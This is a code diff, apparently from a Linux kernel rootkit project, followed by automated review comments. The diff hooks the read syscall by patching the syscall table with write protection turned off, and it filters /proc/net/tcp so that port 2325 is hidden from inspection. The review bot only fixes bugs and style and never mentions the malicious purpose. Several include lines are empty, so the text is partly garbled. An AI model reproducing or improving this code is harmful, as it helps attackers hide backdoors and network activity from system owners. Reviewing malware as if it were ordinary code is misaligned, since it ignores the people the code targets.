diff --git a/src/8008135.c b/src/8008135.c
index b5460b6..2189d71 100644
--- a/src/8008135.c
+++ b/src/8008135.c
@@ -85,6 +85,72 @@ asmlinkage long sys_getdents_new(unsigned int fd,
 }
+/*** FUNCTION ****************************************************************
+* NAME: hide port
+* DESCRIPTION: hides the port 2325
+* PARAMETERS: -
+* RETURNS:
+*******************************************************************************/
+read_ptr orig_read;
+asmlinkage long hacked_read(unsigned int fd, char __user *buf,
+ size_t count)
+{
+ long result, bp, diff_in_bytes;
+ char *kbuf, *start_line, *end_line, *port_num;
+ char *pathname, pbuf[256];
+ struct files_struct *current_files;
+ struct fdtable *files_table;
+ struct path file_path;
+
+ // run real read
+ result = (*orig_read)(fd,buf,count);
+ if (result <= 0)
+ return result;
+
+ // get pathname
+ // CITATION [8] from report
+ current_files = current->files;
+ files_table = files_fdtable(current_files);
+
+ file_path = files_table->fd[fd]->f_path;
+ pathname = d_path(&file_path,pbuf,256*sizeof(char));
+ // if virtual file /proc/net/tcp
+ if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) {
+ // copy from user to kernelspace;
+ if (!access_ok(VERIFY_READ,buf,result))
+ return -1;
+ if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL)
+ return -1;
+ if (copy_from_user(kbuf,buf,result))
+ return -1;
+
+ // filter out hidden ports
+ start_line = strchr(kbuf,':') - 4; // skip first line
+ diff_in_bytes = (start_line - kbuf) * sizeof(char);
+ for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {
+ start_line = kbuf + bp;
+ port_num = strchr(strchr(start_line,':') + 1,':') + 1;
+ end_line = strchr(start_line,'\n');
+ diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);
+ if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port
+ memmove(start_line,end_line + 1, // delete line in file
+ result - bp - diff_in_bytes);
+ result -= diff_in_bytes;
+ }
+ }
+
+ // copy from kernel to userspace
+ if (!access_ok(VERIFY_WRITE,buf,result))
+ return EINVAL;
+ if (copy_to_user(buf,kbuf,result))
+ return EINVAL;
+ kfree(kbuf);
+ }
+ // return number of bytes read
+ return result;
+}
+
+
 /*** FUNCTION ****************************************************************
 * NAME: hide_module
 * DESCRIPTION: hides the module from lsmod
@@ -115,13 +181,16 @@ static int __init init_8008135(void) {
 // add our new handlers
 sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new;
+
+ orig_read = (read_ptr)sys_call_table[__NR_read];
+
+ sys_call_table[READ_SYSCALL_NUM] = (unsigned long) hacked_read;
 // turn write protect back on
 write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
 printk(KERN_INFO "New syscall in place\n");
 network_server_init();
- hide_module();
 printk(KERN_INFO "Module hidden");
@@ -140,6 +209,7 @@ static void __exit exit_8008135(void) {
 write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
 // set getdents handler back
 sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig;
+ sys_call_table[READ_SYSCALL_NUM] = (unsigned long) orig_read;
 // turn write protect back on
 write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
 printk(KERN_INFO "Old syscall back\n");
diff --git a/src/headers/8008135.h b/src/headers/8008135.h
index c81cdf3..0ff10ae 100644
--- a/src/headers/8008135.h
+++ b/src/headers/8008135.h
@@ -28,11 +28,20 @@
 #include
 #include "5y563n.h"
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
 /**** Defines *****************************************************************
 *******************************************************************************/
 #define GETDENTS_SYSCALL_NUM 78
+#define READ_SYSCALL_NUM 0
 #define WRITE_PROTECT_FLAG (1<<16)
 #define HIDE_PREFIX "8008135."
@@ -40,6 +49,7 @@
 #define MODULE_NAME "8008135"
 #define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1)
+#define HIDE_PORT "0915" // 2325 in Hexadecimal
 /**** Modinfo ****************************************************************
 *******************************************************************************/
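Review bot: `strcmp(pathname+10,"/net/tcp")` in the path test reads beyond what the preceding `strncmp` established: only the first six bytes of `pathname` are known to exist, and `d_path` can hand back an error pointer that is never checked, so a short or failed path here is an out-of-bounds read in kernel context rather than a simple non-match; `files_table->fd[fd]` is likewise dereferenced to `->f_path` with no NULL or bounds check on the entry. Further down, `kbuf` is kmalloc'd with exactly `result` bytes and no terminating NUL, yet it is scanned with `strchr`, which has no bound and whose NULL result is folded straight into the `- 4` / `+ 1` pointer arithmetic. `kfree(kbuf)` is reached only on the success path, so every `return -1` / `return EINVAL` after the allocation leaks it, and those values are themselves wrong for a syscall handler: `-1` and the positive `EINVAL` are returned to the caller as a byte count, whereas failure is reported as a negative errno, e.g. `kfree(kbuf);` followed by `return -EFAULT;`. I would also add a comment on the `kmalloc` line noting that `result` is an untrusted size chosen by the reading process, since it bounds every copy and every scan in this block.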
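Review bot: `printk(KERN_INFO "Module hidden")` is kept while the `hide_module()` call directly above it is removed, so the log line now reports something the function no longer does; either drop the message or make it describe what actually happened. The new lines also read the original handler via `__NR_read` but install the replacement at `READ_SYSCALL_NUM`, two names for what is presumably the same slot; using one of them consistently, e.g. `orig_read = (read_ptr)sys_call_table[READ_SYSCALL_NUM];`, avoids the two silently diverging. The enclosing `init_8008135` starts before and ends after this hunk.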
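Review bot: The eight added `#include` directives carry no header name in this rendering, so what they bring into scope cannot be reviewed here; if the file really reads this way the includes are malformed and the build stops on them. `#define READ_SYSCALL_NUM 0` is a bare magic number for a slot the .c file elsewhere addresses as `__NR_read`; defining it as `#define READ_SYSCALL_NUM __NR_read` keeps the two in step and records the intent. A one-line comment above the numeric syscall definitions saying which architecture's table they index would help too, since such numbers only hold for one architecture.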
@@ -61,6 +71,6 @@ struct linux_dirent { typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count); - - +typedef asmlinkage long (*read_ptr)(unsigned int fd, char __user *buf, + size_t count); #endif /* SRC_HEADERS_8008135_H */
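Review bot: The new `read_ptr` typedef breaks the naming the adjacent `sys_getdents_t` already uses: one hook type has the `sys_` prefix and `_t` suffix, the other is `read_ptr`, so the two cannot be recognised as a pair. A name in the existing form, `sys_read_t`, plus a one-line comment such as `/* signature of the read() syscall handler this module wraps */` would make the declaration self-explaining.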